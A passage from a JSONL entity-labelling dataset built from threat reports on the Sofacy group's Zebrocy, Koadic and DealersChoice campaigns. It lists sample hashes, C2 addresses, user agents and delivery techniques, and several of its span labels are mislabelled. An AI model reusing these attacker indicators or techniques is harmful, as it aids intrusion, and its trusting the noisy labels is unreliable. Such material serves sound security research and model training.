persistent on the system even though the custom backdoor is installed only for a few hours .", "spans": [{"start": 17, "end": 20, "label": "System"}]} {"text": "Second , the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration .", "spans": [{"start": 39, "end": 42, "label": "System"}, {"start": 84, "end": 90, "label": "System"}, {"start": 104, "end": 107, "label": "System"}]} {"text": "Sofacy Group\u2019s Parallel Attacks .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "The Sofacy group remains a persistent global threat .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]} {"text": "Unit 42 and others have shown in the first half of 2018 how this threat actor group continues to target multiple organizations throughout the world with a strong emphasis on government , diplomatic and other strategic organizations primarily in North America and Europe .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "Following up our most recent Sofacy research in February and March of 2018 , we have found a new campaign that uses a lesser known tool widely attributed to the Sofacy group called Zebrocy .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 161, "end": 167, "label": "Organization"}, {"start": 181, "end": 188, "label": "Malware"}]} {"text": "Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 75, "end": 84, "label": "Organization"}, {"start": 85, "end": 91, "label": "Organization"}]} {"text": "This third campaign is consistent with two previously reported attack campaigns in terms of targeting : the targets were government organizations dealing with foreign affairs .", "spans": []} {"text": "In this case however the targets were in different 
geopolitical regions .", "spans": []} {"text": "An interesting difference we found in this newest campaign was that the attacks using Zebrocy cast a far wider net within the target organization : the attackers sent phishing emails to an exponentially larger number of individuals .", "spans": [{"start": 86, "end": 93, "label": "Malware"}, {"start": 176, "end": 182, "label": "System"}]} {"text": "The targeted individuals did not follow any significant pattern , and the email addresses were found easily using web search engines .", "spans": [{"start": 74, "end": 79, "label": "System"}]} {"text": "This is a stark contrast with other attacks commonly associated with the Sofacy group where generally no more than a handful of victims are targeted within a single organization in a focus-fire style of attack .", "spans": [{"start": 73, "end": 79, "label": "Organization"}]} {"text": "In addition to the large number of Zebrocy attacks we discovered , we also observed instances of the Sofacy group leveraging the Dynamic Data Exchange ( DDE ) exploit technique previously documented by McAfee .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 129, "end": 150, "label": "Indicator"}, {"start": 153, "end": 156, "label": "Indicator"}, {"start": 202, "end": 208, "label": "Organization"}]} {"text": "The instances we observed , however , used the DDE exploit to deliver different payloads than what was observed previously .", "spans": []} {"text": "In one instance the DDE attack was used to deliver and install Zebrocy .", "spans": [{"start": 20, "end": 23, "label": "Indicator"}, {"start": 63, "end": 70, "label": "Malware"}]} {"text": "In another instance , the DDE attack was used to deliver an open-source penetration testing toolkit called Koadic .", "spans": [{"start": 26, "end": 29, "label": "Indicator"}, {"start": 107, "end": 113, "label": "System"}]} {"text": "The Sofacy group has leveraged open source or 
freely available tools and exploits in the past but this is the first time that Unit 42 has observed them leveraging the Koadic toolkit .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 126, "end": 133, "label": "Organization"}, {"start": 167, "end": 173, "label": "System"}]} {"text": "In our February report , we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities .", "spans": [{"start": 43, "end": 49, "label": "Organization"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 72, "end": 78, "label": "Organization"}, {"start": 126, "end": 139, "label": "Malware"}]} {"text": "In that report , we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks .", "spans": [{"start": 56, "end": 62, "label": "Organization"}]} {"text": "In particular , we noted that the Sofacy group deployed a webpage on each of the domains .", "spans": [{"start": 34, "end": 40, "label": "Organization"}]} {"text": "This is odd because attackers almost never set up an actual webpage on adversary C2 infrastructure .", "spans": [{"start": 81, "end": 83, "label": "System"}]} {"text": "Even stranger , each webpage contained the same content within the body .", "spans": []} {"text": "Since that report , we continued our research into this oddity .", "spans": []} {"text": "Using this artifact , we were able to pivot and discover another attack campaign using the DealersChoice exploit kit with similar victimology to what we saw in February .", "spans": [{"start": 91, "end": 104, "label": "System"}]} {"text": "Continuing to use this artifact , we discovered another domain with the same content body , supservermgr.com .", "spans": []} {"text": "This domain was registered on December 20 , 2017 and within 
a few days was resolving to 92.222.136.105 , which belonged to a well-known VPS provider often used by the Sofacy group .", "spans": [{"start": 88, "end": 102, "label": "Indicator"}, {"start": 136, "end": 139, "label": "System"}, {"start": 167, "end": 173, "label": "Organization"}]} {"text": "Unfortunately , at the time of collection , the C2 domain had been sinkholed by a third party .", "spans": [{"start": 48, "end": 50, "label": "System"}]} {"text": "Based on dynamic and static analysis of the malware sample associated with the supservermgr.com domain however , we were able to determine several unique artifacts which allowed us to expand our dataset and discover additional findings .", "spans": [{"start": 79, "end": 95, "label": "Indicator"}]} {"text": "First , we determined the sample we collected , d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc was attempting to communicate to its C2 at http://supservermgr.com/sys/upd/pageupd.php to retrieve a Zebrocy AutoIT downloader .", "spans": [{"start": 48, "end": 112, "label": "Indicator"}, {"start": 150, "end": 152, "label": "System"}, {"start": 156, "end": 199, "label": "Indicator"}, {"start": 214, "end": 221, "label": "Malware"}, {"start": 222, "end": 228, "label": "System"}]} {"text": "Because the domain had been sinkholed , this activity could not be completed .", "spans": []} {"text": "Using AutoFocus , we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent .", "spans": [{"start": 6, "end": 15, "label": "System"}, {"start": 99, "end": 106, "label": "Malware"}]} {"text": "This led us to additional infrastructure for Zebrocy at 185.25.51.198 and 185.25.50.93 .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 56, "end": 69, "label": "Indicator"}, {"start": 74, "end": 86, "label": "Indicator"}]} {"text": "At this point we had collected nearly thirty samples of Zebrocy in relation to the original sample and 
its associated C2 domain .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 118, "end": 120, "label": "System"}]} {"text": "Additional pivoting based on artifacts unique to this malware family expanded our dataset to hundreds of samples used over the last several years .", "spans": []} {"text": "Most of the additional samples were the Delphi and AutoIT variants as reported by ESET .", "spans": [{"start": 40, "end": 46, "label": "System"}, {"start": 51, "end": 57, "label": "System"}, {"start": 82, "end": 86, "label": "Organization"}]} {"text": "However , several of the collected samples were a C++ variant of the Zebrocy downloader tool .", "spans": [{"start": 50, "end": 53, "label": "System"}, {"start": 69, "end": 76, "label": "Malware"}]} {"text": "In addition , we discovered evidence of a completely different payload in Koadic being delivered as well .", "spans": [{"start": 74, "end": 80, "label": "System"}]} {"text": "Also , we found the IP address 185.25.50.93 hosting C2 services for a Delphi backdoor that ESET \u2019s report states is the final stage payload for these attacks .", "spans": [{"start": 31, "end": 43, "label": "Indicator"}, {"start": 52, "end": 54, "label": "System"}, {"start": 70, "end": 76, "label": "System"}, {"start": 91, "end": 95, "label": "Organization"}]} {"text": "Please note this is not a comprehensive chart of all Zebrocy and Koadic samples we were able to collect .", "spans": [{"start": 53, "end": 60, "label": "Malware"}]} {"text": "Only samples mentioned or relevant to the relational analysis have been included .", "spans": []} {"text": "From the 185.25.50.93 C2 IP , we discovered another hard-coded user agent being used by Zebrocy :", "spans": [{"start": 9, "end": 21, "label": "Indicator"}, {"start": 22, "end": 24, "label": "System"}, {"start": 88, "end": 95, "label": "Malware"}]} {"text": "Mozilla ( Windows NT 6.1 ; WOW64 ) WinHttp/1.6.3.8 ( WinHTTP/5.1 ) like Gecko .", "spans": [{"start": 0, "end": 7, "label": 
"Organization"}, {"start": 10, "end": 17, "label": "System"}, {"start": 72, "end": 77, "label": "System"}]} {"text": "We observed several samples of Zebrocy using this user agent targeting the foreign affairs ministry of a large Central Asian nation .", "spans": [{"start": 31, "end": 38, "label": "Malware"}]} {"text": "Pivoting off of this artifact provided us additional Zebrocy samples .", "spans": [{"start": 53, "end": 60, "label": "Malware"}]} {"text": "One sample in particular , cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df used yet another unique user agent string in combination with the previous user agent for its C2 : Mozilla v5.1 ( Windows NT 6.1 ; rv : 6.0.1 ) Gecko Firefox .", "spans": [{"start": 27, "end": 91, "label": "Indicator"}, {"start": 186, "end": 188, "label": "System"}, {"start": 191, "end": 198, "label": "Organization"}, {"start": 206, "end": 213, "label": "System"}, {"start": 236, "end": 241, "label": "System"}, {"start": 242, "end": 249, "label": "System"}]} {"text": "A malware sample using two separate unique user agent strings is uncommon .", "spans": []} {"text": "A closer examination of the tool revealed the second user agent string was from a secondary payload that was retrieved by the cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df sample .", "spans": [{"start": 126, "end": 190, "label": "Indicator"}]} {"text": "Pivoting from the Mozilla v5.1 user agent revealed over forty additional Zebrocy samples , with several again targeting the same Central Asian nation .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 73, "end": 80, "label": "Malware"}]} {"text": "Two samples specifically , 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 and 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 provided additional artifacts we were able to pivot from to discover weaponized documents to deliver Zebrocy as well as a Koadic .", "spans": [{"start": 27, "end": 91, 
"label": "Indicator"}, {"start": 96, "end": 160, "label": "Indicator"}, {"start": 262, "end": 269, "label": "Malware"}, {"start": 283, "end": 289, "label": "System"}]} {"text": "Examining the use of the unique user agents \u2019 strings over time shows that while previously only the Mozilla user agent was in use , since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications .", "spans": [{"start": 101, "end": 108, "label": "Organization"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 220, "end": 222, "label": "System"}]} {"text": "The two weaponized documents we discovered leveraging DDE were of particular interest due to victimology and a change in tactics .", "spans": []} {"text": "While examining 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 , we were able to pivot from its C2", "spans": [{"start": 16, "end": 80, "label": "Indicator"}, {"start": 114, "end": 116, "label": "System"}]} {"text": "220.158.216.127 to gather additional Zebrocy samples as well as a weaponized document .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 37, "end": 44, "label": "Malware"}]} {"text": "This document 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 appears to have been targeting a North American government organization dealing with foreign affairs .", "spans": [{"start": 14, "end": 78, "label": "Indicator"}]} {"text": "It leveraged DDE to retrieve and install a payload onto the victim host .", "spans": [{"start": 13, "end": 16, "label": "Indicator"}]} {"text": "A decoy document is deployed in this attack , with the contents purporting to be a publicly available document from the United Nations regarding the Republic of Uzbekistan .", "spans": []} {"text": "The creator of the weaponized document appended their DDE instructions to the end of the document after all of the decoy contents .", "spans": []} {"text": "When the document is opened in Word , the instructions are 
not immediately visible , as Word does not display these fields contents by default .", "spans": [{"start": 31, "end": 35, "label": "System"}, {"start": 88, "end": 92, "label": "System"}]} {"text": "As you can see in the following screenshot , simply attempting to highlight the lines in which the DDE instructions reside does not display them .", "spans": [{"start": 99, "end": 102, "label": "Indicator"}]} {"text": "Enabling the \u201c Toggle Field Codes \u201d feature reveals the DDE instructions to us and shows that the author had set instructions to size 1 font and with a white coloring .", "spans": [{"start": 56, "end": 59, "label": "Indicator"}]} {"text": "The use of a white font coloring to hide contents within a weaponized document is a technique we had previously reported being used by the Sofacy group in a malicious macro attack .", "spans": [{"start": 139, "end": 145, "label": "Organization"}]} {"text": "The DDE instructions attempt to run the following command on the victim host , which attempts to download and execute a payload from a remote server .", "spans": [{"start": 4, "end": 7, "label": "Indicator"}]} {"text": "During our analysis , we observed this DDE downloading and executing a Zebrocy AutoIt downloader f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 , configured to attempt to download an additional payload from 220.158.216.127 .", "spans": [{"start": 39, "end": 42, "label": "Indicator"}, {"start": 71, "end": 78, "label": "Malware"}, {"start": 79, "end": 85, "label": "System"}, {"start": 97, "end": 161, "label": "Indicator"}, {"start": 225, "end": 240, "label": "Indicator"}]} {"text": "The DDE instructions also included another command that it did not run , which suggests it is an artifact of a prior version of this delivery document .", "spans": [{"start": 4, "end": 7, "label": "Indicator"}]} {"text": "The following shows this unused command , which exposed an additional server within Sofacy \u2019s infrastructure 
would download and execute an encoded PowerShell script from 92.114.92.102 .", "spans": [{"start": 84, "end": 90, "label": "Organization"}, {"start": 147, "end": 157, "label": "System"}, {"start": 170, "end": 183, "label": "Indicator"}]} {"text": "The unused command above appears to be related to previous attacks , specifically attacks that occurred in November 2017 as discussed by McAfee and ESET .", "spans": [{"start": 137, "end": 143, "label": "Organization"}, {"start": 148, "end": 152, "label": "Organization"}]} {"text": "The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp , which differs from the Zebrocy downloader delivered in the February 2018 attacks . 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 was another Zebrocy sample we were able to pivot from by gathering additional samples connecting to its C2 86.106.131.177 .", "spans": [{"start": 59, "end": 62, "label": "Indicator"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 124, "end": 131, "label": "Malware"}, {"start": 184, "end": 248, "label": "Indicator"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 353, "end": 355, "label": "System"}, {"start": 356, "end": 370, "label": "Indicator"}]} {"text": "The additional samples targeted the same large Central Asian nation state as previously mentioned but more interestingly , one of the samples was a weaponized document also leveraging DDE and containing a non-Zebrocy payload .", "spans": [{"start": 184, "end": 187, "label": "Indicator"}]} {"text": "The payload turned out to be an open source penetration test toolkit called Koadic .", "spans": []} {"text": "It is a toolkit similar to Metasploit or PowerShell Empire and is freely available to anyone on Github .", "spans": [{"start": 27, "end": 37, "label": "System"}, {"start": 41, "end": 51, "label": "System"}, {"start": 52, "end": 58, "label": "System"}, {"start": 96, "end": 102, "label": "System"}]} {"text": "The RTF 
document 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff was very small in size at 264 bytes .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 17, "end": 81, "label": "Indicator"}]} {"text": "The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server , save it as an executable file on the system and then execute the payload .", "spans": [{"start": 27, "end": 30, "label": "Indicator"}, {"start": 48, "end": 57, "label": "Organization"}, {"start": 58, "end": 62, "label": "System"}, {"start": 72, "end": 82, "label": "System"}, {"start": 106, "end": 112, "label": "System"}]} {"text": "The Sofacy group continues their targeted attack campaigns in 2018 .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]} {"text": "As mentioned in this blog , Sofacy is carrying out parallel campaigns to attack similar targets around the world but with different toolsets .", "spans": [{"start": 28, "end": 34, "label": "Organization"}]} {"text": "The Zebrocy tool associated with this current strain of attacks is constructed in several different forms based on the programming language the developer chose to create the tool .", "spans": [{"start": 4, "end": 11, "label": "Malware"}]} {"text": "We have observed Delphi , AutoIt , and C++ variants of Zebrocy , all of which are related not only in their functionality , but also at times by chaining the variants together in a single attack .", "spans": [{"start": 17, "end": 23, "label": "System"}, {"start": 26, "end": 32, "label": "System"}, {"start": 39, "end": 42, "label": "System"}, {"start": 55, "end": 62, "label": "Malware"}]} {"text": "These attacks are still largely perpetrated via spear phishing campaigns , whether via simple executable attachments in hopes that a victim will launch the file to using a previously observed DDE exploitation technique .", "spans": [{"start": 192, "end": 195, "label": "Indicator"}]} 
{"text": "Sofacy Uses DealersChoice to Target European Government Agency .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 12, "end": 25, "label": "System"}]} {"text": "Back in October 2016 , Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice .", "spans": [{"start": 66, "end": 71, "label": "System"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 134, "end": 147, "label": "System"}]} {"text": "The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 34, "end": 38, "label": "System"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 79, "end": 84, "label": "System"}, {"start": 133, "end": 138, "label": "System"}]} {"text": "Sofacy continued to use DealersChoice throughout the fall of 2016 , which we also documented in our December 2016 publication discussing Sofacy \u2019s larger campaign .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 24, "end": 37, "label": "System"}, {"start": 137, "end": 143, "label": "Organization"}]} {"text": "On March 12 and March 14 , we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice .", "spans": [{"start": 43, "end": 49, "label": "Organization"}, {"start": 143, "end": 156, "label": "System"}]} {"text": "The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server , but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed .", "spans": [{"start": 12, "end": 25, "label": "System"}, {"start": 81, "end": 86, "label": "System"}, {"start": 101, "end": 103, "label": 
"System"}, {"start": 144, "end": 149, "label": "System"}]} {"text": "One of the differences was a particularly clever evasion technique : to our knowledge this has never been observed in use .", "spans": []} {"text": "With the previous iterations of DealersChoice samples , the Flash object would immediately load and begin malicious tasks .", "spans": [{"start": 32, "end": 45, "label": "System"}, {"start": 60, "end": 65, "label": "System"}]} {"text": "In the March attacks , the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on .", "spans": [{"start": 27, "end": 32, "label": "System"}, {"start": 159, "end": 164, "label": "System"}]} {"text": "Also , DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system .", "spans": [{"start": 7, "end": 20, "label": "System"}, {"start": 67, "end": 69, "label": "System"}]} {"text": "The overall process to result in a successful exploitation is :", "spans": []} {"text": "User must open the Microsoft Word email attachment ;", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 29, "end": 33, "label": "System"}, {"start": 34, "end": 39, "label": "System"}]} {"text": "User must scroll to page three of the document , which will run the DealersChoice Flash object ;", "spans": [{"start": 68, "end": 81, "label": "System"}, {"start": 82, "end": 87, "label": "System"}]} {"text": "The Flash object must contact an active C2 server to download an additional Flash object containing exploit code ;", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 40, "end": 42, "label": "System"}, {"start": 76, "end": 81, "label": "System"}]} {"text": "The initial Flash object must contact the same C2 server to download a secondary payload ;", "spans": [{"start": 12, "end": 17, "label": "System"}, {"start": 47, "end": 49, "label": "System"}]} {"text": "Victim host must 
have a vulnerable version of Flash installed .", "spans": [{"start": 46, "end": 51, "label": "System"}]} {"text": "The attack involving this updated variant of DealersChoice was targeting a European government organization .", "spans": [{"start": 45, "end": 58, "label": "System"}]} {"text": "The attack relied on a spear-phishing email with a subject of \u201c Defence & Security 2018 Conference Agenda \u201d that had an attachment with a filename of \u201c Defence&Security_2018_Conference_Agenda.docx \u201d .", "spans": [{"start": 38, "end": 43, "label": "System"}, {"start": 152, "end": 196, "label": "Indicator"}]} {"text": "The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the \u201c Underwater Defence & Security 2018 Conference \u201d here .", "spans": [{"start": 60, "end": 66, "label": "Organization"}]} {"text": "Opening the attached \u201c Defence & Security 2018 Conference Agenda.docx \u201d file does not immediately run malicious code to exploit the system .", "spans": [{"start": 23, "end": 69, "label": "Indicator"}]} {"text": "Instead , the user must scroll to the third page of the document , which will load a Flash object that contains ActionScript that will attempt to exploit the user \u2019s system to install a malicious payload .", "spans": [{"start": 85, "end": 90, "label": "System"}, {"start": 112, "end": 124, "label": "System"}]} {"text": "The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 101, "end": 114, "label": "System"}]} {"text": "This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse through it .", "spans": [{"start": 23, "end": 29, "label": "Organization"}]} {"text": "We analyzed the document to determine the reason that the malicious Flash object only ran when the 
user scrolled to the third page .", "spans": [{"start": 68, "end": 73, "label": "System"}]} {"text": "According to the document.xml file , the DealersChoice loader SWF exists after the \u201c covert-shores-small.png \u201d image file within the delivery document .", "spans": [{"start": 17, "end": 29, "label": "Indicator"}, {"start": 41, "end": 54, "label": "System"}, {"start": 62, "end": 65, "label": "System"}, {"start": 85, "end": 108, "label": "Indicator"}]} {"text": "This image file exists on the third page of the document , so the user would have to scroll down in the document to this third page to get the SWF file to run .", "spans": [{"start": 143, "end": 146, "label": "System"}]} {"text": "The user may not notice the Flash object on the page , as Word displays it as a tiny black box in the document , as seen in Figure 1 .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 58, "end": 62, "label": "System"}]} {"text": "This is an interesting anti-sandbox technique , as it requires human interaction prior to the document exhibiting any malicious activity .", "spans": []} {"text": "This DealersChoice Flash object shares a similar process to previous variants ; however , it appears that the Sofacy actors have made slight changes to its internal code .", "spans": [{"start": 5, "end": 18, "label": "System"}, {"start": 19, "end": 24, "label": "System"}, {"start": 110, "end": 116, "label": "Organization"}]} {"text": "Also , it appears that the actors used ActionScript from an open source video player called \u201c f4player \u201d , which is freely available on GitHub .", "spans": [{"start": 39, "end": 51, "label": "System"}, {"start": 94, "end": 102, "label": "System"}, {"start": 136, "end": 142, "label": "System"}]} {"text": "The Sofacy developer modified the f4player \u2019s ActionScript to include additional code to load an embedded Flash object .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 34, "end": 42, "label": 
"System"}, {"start": 46, "end": 58, "label": "System"}, {"start": 106, "end": 111, "label": "System"}]} {"text": "The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function ( \u201c skinEvent2 \u201d ) that plays the decrypted object .", "spans": [{"start": 50, "end": 55, "label": "System"}]} {"text": "The above code allows DealersChoice to load a second SWF object , specifically loading it with an argument that includes a C2 URL of \u201c http://ndpmedia24.com/0pq6m4f.m3u8 \u201d .", "spans": [{"start": 22, "end": 35, "label": "System"}, {"start": 53, "end": 56, "label": "System"}, {"start": 123, "end": 125, "label": "System"}, {"start": 135, "end": 169, "label": "Indicator"}]} {"text": "The embedded SWF extracts the domain from the C2 URL passed to it and uses it to craft a URL to get the server \u2019s \u2018 crossdomain.xml \u2019 file in order to obtain permissions to load additional Flash objects from the C2 domain .", "spans": [{"start": 13, "end": 16, "label": "System"}, {"start": 46, "end": 48, "label": "System"}, {"start": 116, "end": 131, "label": "Indicator"}, {"start": 189, "end": 194, "label": "System"}, {"start": 212, "end": 214, "label": "System"}]} {"text": "The ActionScript relies on event listeners to call specific functions when the event \u201c Event.COMPLETE \u201d is triggered after successful HTTP requests are issued to the C2 server .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 87, "end": 101, "label": "Indicator"}, {"start": 134, "end": 138, "label": "Indicator"}, {"start": 166, "end": 168, "label": "System"}]} {"text": "The event handlers call functions with the following names , which includes an incrementing number that represents the order in which the functions are called : onload1 , onload2 , onload3 , onload5 .", "spans": []} {"text": "With these event handlers created , the ActionScript starts by gathering system data from the 
flash.system.Capabilities.serverString property ( just like in the original DealersChoice.B samples ) and issues an HTTP GET with the system data as a parameter to the C2 URL that was passed as an argument to the embedded SWF when it was initially loaded .", "spans": [{"start": 40, "end": 52, "label": "System"}, {"start": 170, "end": 185, "label": "Indicator"}, {"start": 210, "end": 214, "label": "Indicator"}, {"start": 262, "end": 264, "label": "System"}, {"start": 316, "end": 319, "label": "System"}]} {"text": "When this HTTP request completes , the event listener will call the \u2018 onload1 \u2019 function .", "spans": [{"start": 10, "end": 14, "label": "Indicator"}]} {"text": "The \u2018 onload1 \u2019 function parses the response data from the request to the C2 URL using regular expressions .", "spans": [{"start": 74, "end": 76, "label": "System"}]} {"text": "The regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Steaming ( HLS ) traffic , which is a protocol that uses HTTP to deliver audio and video files for streaming .", "spans": [{"start": 41, "end": 43, "label": "System"}, {"start": 99, "end": 117, "label": "System"}, {"start": 120, "end": 123, "label": "System"}, {"start": 166, "end": 170, "label": "Indicator"}]} {"text": "The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate .", "spans": [{"start": 11, "end": 14, "label": "System"}, {"start": 41, "end": 53, "label": "System"}, {"start": 68, "end": 76, "label": "System"}]} {"text": "The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server .", "spans": [{"start": 88, "end": 100, "label": "System"}, {"start": 134, "end": 136, "label": "System"}]} {"text": "The \u2018 onload1 \u2019 function then sends an HTTP GET request to the C2 domain using the value stored in the \u2018 r3 \u2019 variable as a URL .", 
"spans": [{"start": 39, "end": 43, "label": "Indicator"}, {"start": 63, "end": 65, "label": "System"}]} {"text": "When this HTTP request completes , the event listener will call the \u2018 onload2 \u2019 function .", "spans": [{"start": 10, "end": 14, "label": "Indicator"}]} {"text": "The \u2018 onload2 \u2019 function decrypts the response received from the HTTP request issued in \u2018 onload1 \u2019 function .", "spans": [{"start": 65, "end": 69, "label": "Indicator"}]} {"text": "It does so by calling a sub-function to decrypt the content , using the value stored in the \u2018 r1 \u2019 variable as a key .", "spans": []} {"text": "The sub-function to decrypt the content skips the first 4 bytes , suggesting that the first four bytes of the downloaded content is in cleartext ( most likely the \u201c FWS \u201d or \u201c CWS \u201d header to look legitimate ) .", "spans": [{"start": 165, "end": 168, "label": "System"}, {"start": 176, "end": 179, "label": "System"}]} {"text": "After decrypting the content , the \u2018 onload2 \u2019 function will issue another HTTP GET request with the system data as a parameter , but this time to the C2 using a URL from the \u2018 r4 \u2019 variable .", "spans": [{"start": 75, "end": 79, "label": "Indicator"}, {"start": 151, "end": 153, "label": "System"}]} {"text": "When this request completes , the event listener will call the \u2018 onload3 \u2019 function .", "spans": []} {"text": "The \u2018 onload3 \u2019 function will take the response to the HTTP request in \u2018 onload2 \u2019 and treat it as the payload .", "spans": [{"start": 55, "end": 59, "label": "Indicator"}]} {"text": "The ActionScript will read each byte of the C2 response and get the hexadecimal value .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 44, "end": 46, "label": "System"}]} {"text": "This hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable ( PE ) payload .", 
"spans": [{"start": 109, "end": 128, "label": "System"}, {"start": 131, "end": 133, "label": "System"}]} {"text": "The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in \u2018 onload2 \u2019 .", "spans": [{"start": 91, "end": 94, "label": "System"}]} {"text": "This function creates an event listener for when the SWF file is successfully loaded , which will call the \u2018 onload5 \u2019 function .", "spans": [{"start": 53, "end": 56, "label": "System"}]} {"text": "The \u2018 onload5 \u2019 function is responsible for adding the newly loaded SWF object as a child object .", "spans": [{"start": 68, "end": 71, "label": "System"}]} {"text": "This loads the SWF file , effectively running the malicious code on the system .", "spans": [{"start": 15, "end": 18, "label": "System"}]} {"text": "During our analysis , we were unable to coerce the C2 into providing a malicious SWF or payload .", "spans": [{"start": 51, "end": 53, "label": "System"}, {"start": 81, "end": 84, "label": "System"}]} {"text": "As mentioned in our previous blogs on DealersChoice , the payload of choice for previous variants was SofacyCarberp ( Seduploader ) , but we have no evidence to suggest this tool was used in this attack .", "spans": [{"start": 38, "end": 51, "label": "System"}, {"start": 102, "end": 115, "label": "Malware"}, {"start": 118, "end": 129, "label": "Malware"}]} {"text": "We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack .", "spans": [{"start": 93, "end": 98, "label": "System"}]} {"text": "The delivery document used in this attack was last modified by a user named \u2018 Nick Daemoji \u2019 , which provides a linkage to previous Sofacy related delivery documents .", "spans": [{"start": 132, "end": 138, "label": "Organization"}]} {"text": "The previous documents that used this user name were macro-laden delivery documents that 
installed SofacyCarberp S-MAL/Seduploader payloads , as discussed in Talos \u2019 blog .", "spans": [{"start": 99, "end": 130, "label": "Malware"}]} {"text": "This overlap also points to a similar social engineering theme between these two campaigns , as both used content from upcoming military and defense conferences as a lure .", "spans": []} {"text": "The Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 47, "end": 60, "label": "System"}, {"start": 82, "end": 87, "label": "System"}]} {"text": "In the most recent variant , Sofacy modified the internals of the malicious scripts , but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 178, "end": 183, "label": "System"}, {"start": 221, "end": 223, "label": "System"}]} {"text": "Unlike previous samples , this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object .", "spans": [{"start": 31, "end": 44, "label": "System"}, {"start": 52, "end": 56, "label": "System"}, {"start": 154, "end": 159, "label": "System"}]} {"text": "DealersChoice :", "spans": [{"start": 0, "end": 13, "label": "System"}]} {"text": "0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 ( Defence&Security_2018_Conference_Agenda.docx ) ndpmedia24.com .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 67, "end": 111, "label": "Indicator"}, {"start": 114, "end": 128, "label": "Indicator"}]} {"text": "Corporate IoT \u2013 a path to intrusion .", "spans": [{"start": 10, "end": 13, "label": "System"}]} {"text": "Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide .", "spans": 
